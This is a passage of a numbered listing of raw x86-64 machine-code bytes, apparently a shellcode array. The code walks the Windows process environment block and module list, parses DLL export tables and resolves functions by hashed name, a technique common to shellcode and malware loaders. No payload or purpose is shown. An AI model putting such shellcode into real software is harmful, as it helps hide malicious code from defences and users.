238 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
239 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xbd, 0x28, 0x01,
240 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00,
241 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
242 0x48, 0x81, 0xc4, 0x10, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
243 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
244 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
245 0x60, 0x48, 0x8b, 0x4d, 0x18, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00,
246 0x00, 0x48, 0x8b, 0x55, 0x20, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
247 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
248 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x83, 0xc4, 0x30, 0x5d,
249 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x60, 0x48, 0x89, 0x4d,
250 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
251 0x28, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc,
252 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x65, 0x48, 0x8b, 0x00, 0x48,
253 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x48, 0x8b, 0x40, 0x60, 0x48,
254 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48,
255 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48,
256 0x89, 0x45, 0xf8, 0xeb, 0x45, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
257 0x30, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x3b, 0x45,
258 0x18, 0x74, 0x23, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd8, 0x41,
259 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48,
260 0x8b, 0x4d, 0x10, 0xe8, 0x76, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
261 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89,
262 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85,
263 0xc0, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xa7, 0x48, 0x83,
264 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0xc2,
265 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x3d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x45,
266 0xd0, 0x48, 0x83, 0x7d, 0xd0, 0x00, 0x74, 0x1c, 0x48, 0x8b, 0x45, 0x10,
267 0x4c, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd0,
268 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x08,
269 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
270 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x01,
271 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
272 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0x98, 0x00, 0x00, 0x00,
273 0x4c, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x89, 0x8d, 0xa8, 0x00,
274 0x00, 0x00, 0x48, 0xc7, 0x45, 0x78, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83,
275 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
276 0x00, 0xe9, 0xb3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00,
277 0x00, 0x48, 0x89, 0x45, 0x68, 0x48, 0x8b, 0x45, 0x68, 0x8b, 0x40, 0x3c,
278 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
279 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x05, 0x88,
280 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8b, 0x45, 0x58, 0x8b,
281 0x00, 0x89, 0x45, 0x54, 0x83, 0x7d, 0x54, 0x00, 0x75, 0x0a, 0xb8, 0x00,
282 0x00, 0x00, 0x00, 0xe9, 0x69, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x54, 0x48,
283 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45,
284 0x48, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b,
285 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x40,
286 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85,
287 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x38, 0x48,
288 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98,
289 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x30, 0x48, 0x83,
290 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00,
291 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x18, 0x89, 0x45, 0x74, 0x83, 0x7d,
292 0x74, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xeb, 0x01,
293 0x00, 0x00, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
294 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x01,
295 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00,
296 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x00,
297 0x00, 0x00, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0xc1, 0xe8, 0x62, 0x58,
298 0x00, 0x00, 0x85, 0xc0, 0x75, 0x3a, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01,
299 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x01,
300 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
301 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b, 0x00,
302 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
303 0x48, 0x89, 0x45, 0x78, 0x83, 0x6d, 0x74, 0x01, 0x83, 0x7d, 0x74, 0x00,
304 0x74, 0x3f, 0x48, 0x83, 0x7d, 0x78, 0x00, 0x0f, 0x84, 0x71, 0xff, 0xff,
305 0xff, 0xeb, 0x32, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x50, 0x10, 0x8b, 0x85,
306 0xa8, 0x00, 0x00, 0x00, 0x29, 0xd0, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
307 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b,
308 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
309 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x3b, 0x45,
310 0x48, 0x0f, 0x82, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x58, 0x8b,
311 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x48, 0x48, 0x01, 0xd0, 0x48,
312 0x39, 0x45, 0x78, 0x0f, 0x83, 0xfc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
313 0x78, 0x48, 0x89, 0x45, 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00,
314 0xeb, 0x29, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0,
315 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x70, 0x88, 0x54, 0x05, 0xe0, 0x8b, 0x55,
316 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
317 0x2e, 0x74, 0x1d, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55, 0x70, 0x48, 0x8b,
318 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09,
319 0x83, 0x7d, 0x70, 0x3b, 0x76, 0xc0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x70,
320 0x83, 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x64, 0x8b, 0x45,
321 0x70, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c, 0x8b,
322 0x45, 0x70, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c,
323 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0,
324 0x00, 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x45,
325 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55,
326 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
327 0x45, 0x70, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55,
328 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
329 0xc0, 0x74, 0x06, 0x83, 0x7d, 0x70, 0x3e, 0x76, 0xd1, 0x8b, 0x45, 0x70,
330 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d, 0x4d, 0xa0, 0x48, 0x8d, 0x55,
331 0xe0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49,
332 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x90, 0x00, 0x00, 0x00,
333 0xe8, 0x0c, 0xfc, 0xff, 0xff, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45,
334 0x78, 0x48, 0x81, 0xc4, 0x00, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48,
335 0x89, 0xe5, 0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x4d,
336 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00,
337 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b, 0x55,
338 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
339 0x45, 0xec, 0x88, 0x94, 0x05, 0x50, 0xff, 0xff, 0xff, 0x83, 0x45, 0xec,
340 0x01, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f,
341 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xce,
342 0x8b, 0x45, 0xec, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0x8b,
343 0x45, 0xec, 0x83, 0xe8, 0x04, 0x89, 0xc0, 0x0f, 0xb6, 0x84, 0x05, 0x50,
344 0xff, 0xff, 0xff, 0x3c, 0x2e, 0x74, 0x5f, 0x8b, 0x45, 0xec, 0x8d, 0x50,
345 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff,
346 0xff, 0x2e, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89,
347 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xec,
348 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50,
349 0xff, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55,
350 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x6c, 0x8b,
351 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84,
352 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0xc7, 0x45, 0xa4, 0x30, 0x00, 0x00,
353 0x00, 0x8b, 0x45, 0xa4, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0x98,
354 0x48, 0x8b, 0x45, 0x98, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe0,
355 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xd8,
356 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8,
357 0xe9, 0x8b, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
358 0x30, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45,
359 0xc8, 0x48, 0x8b, 0x45, 0xc8, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48,
360 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b,
361 0x45, 0xc0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x83,
362 0x7d, 0xbc, 0x00, 0x74, 0x43, 0x8b, 0x55, 0xbc, 0x48, 0x8b, 0x45, 0xd0,
363 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b,
364 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48,
365 0x89, 0x45, 0xa8, 0x48, 0x8b, 0x55, 0xa8, 0x48, 0x8d, 0x85, 0x50, 0xff,
366 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x55, 0x00, 0x00, 0x85, 0xc0,
367 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x01,
368 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8,
369 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
370 0x0b, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff,
371 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48,
372 0x8b, 0x50, 0x30, 0x48, 0x8d, 0x85, 0x50, 0xff, 0xff, 0xff, 0x48, 0x89,
373 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0x48,
374 0x81, 0xc4, 0xd0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec,
375 0x60, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
376 0x48, 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01,
377 0x00, 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d,
378 0x08, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00,
379 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89,
380 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
381 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
382 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
383 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00,
384 0x48, 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01,
385 0x00, 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd,
386 0xb4, 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
387 0xe9, 0x76, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48,
388 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
389 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b,
390 0x40, 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01,
391 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x3c,
392 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
393 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01,
394 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8,
395 0x01, 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8,
396 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00,
397 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89,
398 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
399 0x89, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
400 0x00, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
401 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7,
402 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b,
403 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00,
404 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b,
405 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc,
406 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b,
407 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
408 0xc0, 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
409 0x60, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45,
410 0x60, 0x48, 0x89, 0xc1, 0xe8, 0x94, 0x5b, 0x00, 0x00, 0x48, 0x89, 0x85,
411 0x80, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8,
412 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
413 0x8b, 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89,
414 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
415 0x89, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00,
416 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
417 0x45, 0x5b, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
418 0x39, 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xd6, 0x01, 0x00, 0x00,
419 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
420 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01,
421 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
422 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01,
423 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
424 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b,
425 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00,
426 0x0f, 0x82, 0x73, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
427 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
428 0x00, 0x48, 0x01, 0xd0, 0x48, 0x39, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f,
429 0x83, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
430 0x48, 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00,
431 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00,
432 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f,
433 0xb6, 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20,
434 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00,
435 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83,
436 0x85, 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
437 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
438 0x00, 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b,
439 0x76, 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
440 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc,
441 0x01, 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20,
442 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0,
443 0xc6, 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
444 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc,
445 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70,
446 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
447 0x00, 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
448 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85,
449 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01,
450 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
451 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
452 0x74, 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b,
453 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d,
454 0x4d, 0xa0, 0x48, 0x8d, 0x55, 0x20, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
455 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
456 0x8d, 0xf0, 0x01, 0x00, 0x00, 0xe8, 0x43, 0xf6, 0xff, 0xff, 0x48, 0x89,
457 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
458 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xd8,
459 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01, 0x00,
460 0x00, 0x00, 0x0f, 0x84, 0xb0, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd0,
461 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d, 0xc3,
462 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
463 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45, 0xf0,
464 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x30, 0x00, 0x00, 0x00, 0x8b,
465 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b,
466 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b,
